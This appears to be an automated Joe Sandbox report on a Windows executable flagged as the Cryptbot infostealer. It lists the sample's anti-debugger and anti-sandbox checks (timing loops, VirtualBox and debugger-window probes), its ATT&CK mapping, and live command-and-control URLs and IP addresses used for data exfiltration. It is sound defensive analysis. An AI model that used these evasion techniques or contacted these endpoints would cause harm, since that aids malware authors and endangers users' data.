Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6ED0CF6 second address: 6ED0CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6ED0CFC second address: 6ED0D16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6ED0D16 second address: 6ED0D1A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6ED0D1A second address: 6ED0D1E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6ED0D1E second address: 6ED0D24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6ED0D24 second address: 6ED0D2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx ecx, bx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0527 second address: 6EE052B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE052B second address: 6EE053B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0684 second address: 6EE0772 instructions: 0x00000000 rdtsc 0x00000002 mov si, 396Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov esi, dword ptr [ebp+08h] 0x0000000c jmp 00007F519CFC89BEh 0x00000011 sub ecx, ecx 0x00000013 jmp 00007F519CFC89C1h 0x00000018 xchg eax, edi 0x00000019 pushad 0x0000001a movzx ecx, dx 0x0000001d mov al, dh 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F519CFC89BBh 0x00000026 xchg eax, edi 0x00000027 pushad 0x00000028 call 00007F519CFC89C4h 0x0000002d pushfd 0x0000002e jmp 00007F519CFC89C2h 0x00000033 or esi, 1961D3E8h 0x00000039 jmp 00007F519CFC89BBh 0x0000003e popfd 0x0000003f pop ecx 0x00000040 pushfd 0x00000041 jmp 00007F519CFC89C9h 0x00000046 or cx, 5A06h 0x0000004b jmp 00007F519CFC89C1h 0x00000050 popfd 0x00000051 popad 0x00000052 mov eax, 00000001h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a pushfd 0x0000005b jmp 00007F519CFC89C3h 0x00000060 and eax, 1E8B693Eh 0x00000066 jmp 00007F519CFC89C9h 0x0000006b popfd 0x0000006c push eax 0x0000006d pop ebx 0x0000006e popad 0x0000006f rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0772 second address: 6EE07CB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CD4C37Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lock cmpxchg dword ptr [esi], ecx 0x0000000d pushad 0x0000000e call 00007F519CD4C37Ch 0x00000013 mov di, si 0x00000016 pop eax 0x00000017 mov edx, 5F5D2EB2h 0x0000001c popad 0x0000001d mov ecx, eax 0x0000001f jmp 00007F519CD4C389h 0x00000024 cmp ecx, 01h 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F519CD4C37Dh 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE07CB second address: 6EE080C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F519CFC89C1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jne 00007F520D43A7A4h 0x0000000f jmp 00007F519CFC89BEh 0x00000014 pop edi 0x00000015 jmp 00007F519CFC89C0h 0x0000001a pop esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e push ebx 0x0000001f pop esi 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE080C second address: 6EE0812 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(5).exe	RDTSC instruction interceptor: First address: 6EE0812 second address: 6EE0816 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random(5).exe	Special instruction interceptor: First address: 1580BFC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(5).exe	Special instruction interceptor: First address: 17293F0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random(5).exe	Special instruction interceptor: First address: 17B98AB instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\random(5).exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\random(5).exe

Code function: 0_2_01019980 rdtsc

0_2_01019980

Source: C:\Users\user\Desktop\random(5).exe

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,		0_2_00E3255D
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E329FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,		0_2_00E329FF

Source: C:\Users\user\Desktop\random(5).exe

Code function: 0_2_00E3255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,

0_2_00E3255D

Source: random(5).exe, random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: random(5).exe, 00000000.00000003.2251619808.000000000085F000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258565049.0000000000860000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251454551.0000000000848000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251477411.000000000084F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM419-!
Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: random(5).exe, 00000000.00000003.2180479747.0000000006741000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: j@jjY\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#9
Source: random(5).exe	Binary or memory string: Hyper-V RAW
Source: random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\recent_filesprocessesuptime_minutesC:\Windows\System32\VBox.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: random(5).exe, 00000000.00000003.2178594560.00000000007F3000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\random(5).exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\random(5).exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\random(5).exe

Thread information set: HideFromDebugger

Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\random(5).exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\random(5).exe	File opened: NTICE
Source: C:\Users\user\Desktop\random(5).exe	File opened: SICE
Source: C:\Users\user\Desktop\random(5).exe	File opened: SIWVID

Source: C:\Users\user\Desktop\random(5).exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\random(5).exe

Code function: 0_2_01019980 rdtsc

0_2_01019980

Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E31160 SetUnhandledExceptionFilter,	0_2_00E31160
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E311A3 SetUnhandledExceptionFilter,	0_2_00E311A3
Source: C:\Users\user\Desktop\random(5).exe	Code function: 0_2_00E313C9 SetUnhandledExceptionFilter,	0_2_00E313C9

Source: random(5).exe, random(5).exe, 00000000.00000002.2259677510.000000000170A000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: Program Manager

Source: C:\Users\user\Desktop\random(5).exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\random(5).exe	Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\random(5).exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: procmon.exe
Source: random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: random(5).exe PID: 5792, type: MEMORYSTR

Infostealer behavior detected

Source: Signature Results

Signatures: Mutex created, HTTP post and idle behavior

Leaks process information

Source: global traffic

TCP traffic: 192.168.2.6:49711 -> 34.147.147.173:80

Remote Access Functionality

Yara detected Cryptbot

Source: Yara match

File source: Process Memory Space: random(5).exe PID: 5792, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 Process Injection	23 Virtualization/Sandbox Evasion	OS Credential Dumping	751 Security Software Discovery	1 Exploitation of Remote Services	11 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	23 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Data from Local System	4 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	13 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	3 Obfuscated Files or Information	NTDS	1 Remote System Discovery	Distributed Component Object Model	Input Capture	15 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	216 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
random(5).exe	49%	Virustotal		Browse
random(5).exe	45%	ReversingLabs	Win32.Infostealer.Tinba
random(5).exe	100%	Avira	TR/Crypt.TPM.Gen
random(5).exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
KvgPhome.fortth14vs.top	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZ0	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963	100%	Avira URL Cloud	malware
.1.1home.fortth14vs.top	100%	Avira URL Cloud	malware
fortth14vsh14vs.top	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0	100%	Avira URL Cloud	malware
home.fortth14vs.top	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZ	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZT	100%	Avira URL Cloud	malware
.for8014vs.top	0%	Avira URL Cloud	safe
.forth14vs.top	0%	Avira URL Cloud	safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse	100%	Avira URL Cloud	malware
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
home.fortth14vs.top	34.147.147.173	true	false		high
httpbin.org	34.200.57.114	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
.1.1home.fortth14vs.top	true	Avira URL Cloud: malware	unknown
KvgPhome.fortth14vs.top	true	Avira URL Cloud: malware	unknown
fortth14vsh14vs.top	true	Avira URL Cloud: safe	unknown
https://httpbin.org/ip	false		high
home.fortth14vs.top	true	Avira URL Cloud: malware	unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0	true	Avira URL Cloud: malware	unknown
.for8014vs.top	true	Avira URL Cloud: safe	unknown
.forth14vs.top	true	Avira URL Cloud: safe	unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://html4/loose.dtd	random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/http-cookies.html	random(5).exe, random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18	random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
http://home.fortth14vs.top/gduZ0	random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb17355377386963	random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/alt-svc.html	random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false		high
http://.css	random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/hsts.html	random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false		high
https://curl.se/docs/alt-svc.html#	random(5).exe	false		high
https://httpbin.org/ipbefore	random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0U	random(5).exe, 00000000.00000003.2251580735.00000000007F3000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258142461.00000000007F5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah	random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/hsts.html#	random(5).exe	false		high
http://home.fortth14vs.top/gduZ	random(5).exe, random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://home.fortth14vs.top/gduZT	random(5).exe, 00000000.00000003.2251332310.000000000086B000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000003.2251291489.0000000000843000.00000004.00000020.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258581917.000000000086C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://curl.se/docs/http-cookies.html#	random(5).exe	false		high
http://.jpg	random(5).exe, 00000000.00000003.2166958844.000000000719F000.00000004.00001000.00020000.00000000.sdmp, random(5).exe, 00000000.00000002.2258884895.0000000001410000.00000040.00000001.01000000.00000003.sdmp	false		high
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738lse	random(5).exe, 00000000.00000002.2257978659.00000000007BE000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
34.147.147.173	home.fortth14vs.top	United States		2686	ATGS-MMD-ASUS	false
34.200.57.114	httpbin.org	United States		14618	AMAZON-AESUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1583231
Start date and time:	2025-01-02 09:14:09 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 3m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	random(5).exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@1/0@8/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Stop behavior analysis, all processes terminated

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.147.147.173	Set-up.exe	Get hash	malicious	Unknown	Browse	home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
	Set-up.exe	Get hash	malicious	Unknown	Browse	home.eleventj11vt.top/olNuzJxAApOsKhOXzdRo1735639435
	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738
34.200.57.114	Set-up.exe	Get hash	malicious	Unknown	Browse
	Set-up.exe	Get hash	malicious	Unknown	Browse
	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse
	ivHDHq51Ar.exe	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
home.fortth14vs.top	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.147.147.173
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse	91.149.241.220
	yqUQPPp0LM.exe	Get hash	malicious	Unknown	Browse	91.149.241.220
	ZN34wF8WI2.exe	Get hash	malicious	Unknown	Browse	91.149.241.220
	Hqle5OSmLQ.exe	Get hash	malicious	Unknown	Browse	91.149.241.220
httpbin.org	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	TX5LAYBZRI.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Prs9eAnu2k.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	joE9s9sbv0.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	XJiB3BdLTg.exe	Get hash	malicious	Unknown	Browse	34.197.122.172
	Bo6uO5gKL4.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	JbN2WYseAr.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	r8nllkNEQX.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	yqUQPPp0LM.exe	Get hash	malicious	Unknown	Browse	34.197.122.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
AMAZON-AESUS	armv5l.elf	Get hash	malicious	Unknown	Browse	54.145.174.46
	armv4l.elf	Get hash	malicious	Unknown	Browse	3.239.217.249
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	54.62.196.47
	https://mmm.askfollow.us/#CRD	Get hash	malicious	Unknown	Browse	52.86.216.144
	http://l.instagram.com/?0bfd7a413579bfc47b11c1f19890162e=f171d759fb3a033e4eb430517cad3aef&e=ATP3gbWvTZYJbEDeh7rUkhPx4FjctqZcqx8JLHQOt3eCFNBI8ssZ853B2RmMWetLJ63KaZJU&s=1&u=https%3A%2F%2Fbusiness.instagram.com%2Fmicro_site%2Furl%2F%3Fevent_type%3Dclick%26site%3Digb%26destination%3Dhttps%253A%252F%252Fwww.facebook.com%252Fads%252Fig_redirect%252F%253Fd%253DAd8U5WMN2AM7K-NrvRBs3gyfr9DHeZ3ist33ENX9eJBJWMRBAaOOij4rbjtu42P4dXhL8YyD-jl0LZtS1wkFu-DRtZrPI1zyuzAYXXYv3uJfsc2GuuhHJZr0iVcLluY7-XzYStW8tPCtY7q5OaN0ZR5NezqONJHNCe212u1Fk3V5I6c8mMsj53lfF9nQIFCpMtE%2526a%253D1%2526hash%253DAd_y5usHyEC86F8X	Get hash	malicious	Unknown	Browse	34.225.54.239
	https://t.co/YjyGioQuKT	Get hash	malicious	Unknown	Browse	54.84.23.94
	http://img1.wsimg.com/blobby/go/9b6ed793-452c-4f8f-8f80-6847f4d114d7/downloads/71318864754.pdf	Get hash	malicious	Unknown	Browse	52.204.28.27
	https://password-changes.phishwall.net/XMzUzaXgwTnBGZU9XbU9kQnFIZk0vQ3hhQlNtUXJwaExCOTNDYnhpMG92ZHRNQjI5SHhmNUlLTC9JcmVVS2sraDgvUVZtd2YwVFROeGxlbDR0UXBkeGJOUkN3UGliUUNGVHZXWVJ2ek5hZ0FNV290djROWFRxN3JNazM1WlhNOUVLdnlqOEVlbXFaaFROMlltRDFFKzhmU3A0eEl4cE1tMFJmazVYOE5hc25oTjNIR0Q1UzJyNW5wTkNBPT0tLUdCVnp5RnltanNuQnVQWkgtLVA0Uy9TcENHeDltOGdwd282cnZiaEE9PQ==?cid=2317630324	Get hash	malicious	HTMLPhisher, KnowBe4	Browse	23.22.159.74
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
	Set-up.exe	Get hash	malicious	Unknown	Browse	34.200.57.114
ATGS-MMD-ASUS	gZY58wycW0.exe	Get hash	malicious	GhostRat	Browse	34.1.142.70
	random.exe	Get hash	malicious	Credential Flusher	Browse	34.160.144.191
	armv5l.elf	Get hash	malicious	Unknown	Browse	33.8.247.170
	armv7l.elf	Get hash	malicious	Unknown	Browse	56.161.195.74
	armv4l.elf	Get hash	malicious	Unknown	Browse	48.248.220.219
	armv6l.elf	Get hash	malicious	Unknown	Browse	48.15.174.221
	loligang.sh4.elf	Get hash	malicious	Mirai	Browse	57.26.56.105
	loligang.arm7.elf	Get hash	malicious	Mirai	Browse	48.195.166.175
	loligang.mips.elf	Get hash	malicious	Mirai	Browse	34.167.142.96
	loligang.spc.elf	Get hash	malicious	Mirai	Browse	32.159.121.64

File type:	PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Entropy (8bit):	7.987379795408887
